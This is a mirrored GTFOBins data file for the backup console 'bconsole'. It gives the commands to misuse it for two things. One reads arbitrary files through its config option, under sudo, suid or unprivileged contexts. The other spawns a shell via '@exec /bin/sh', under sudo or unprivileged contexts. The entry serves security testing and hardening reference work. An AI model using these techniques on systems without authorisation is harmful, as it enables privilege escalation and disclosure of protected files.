mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-08-09 12:44:11 +02:00
20 lines
352 B
Plaintext
20 lines
352 B
Plaintext
---
|
|
functions:
|
|
file-read:
|
|
- code: |-
|
|
bconsole -c /path/to/file-input
|
|
comment: |-
|
|
The file is actually parsed and the first wrong line is returned in an error message.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
shell:
|
|
- code: |-
|
|
bconsole
|
|
@exec /bin/sh
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
...
|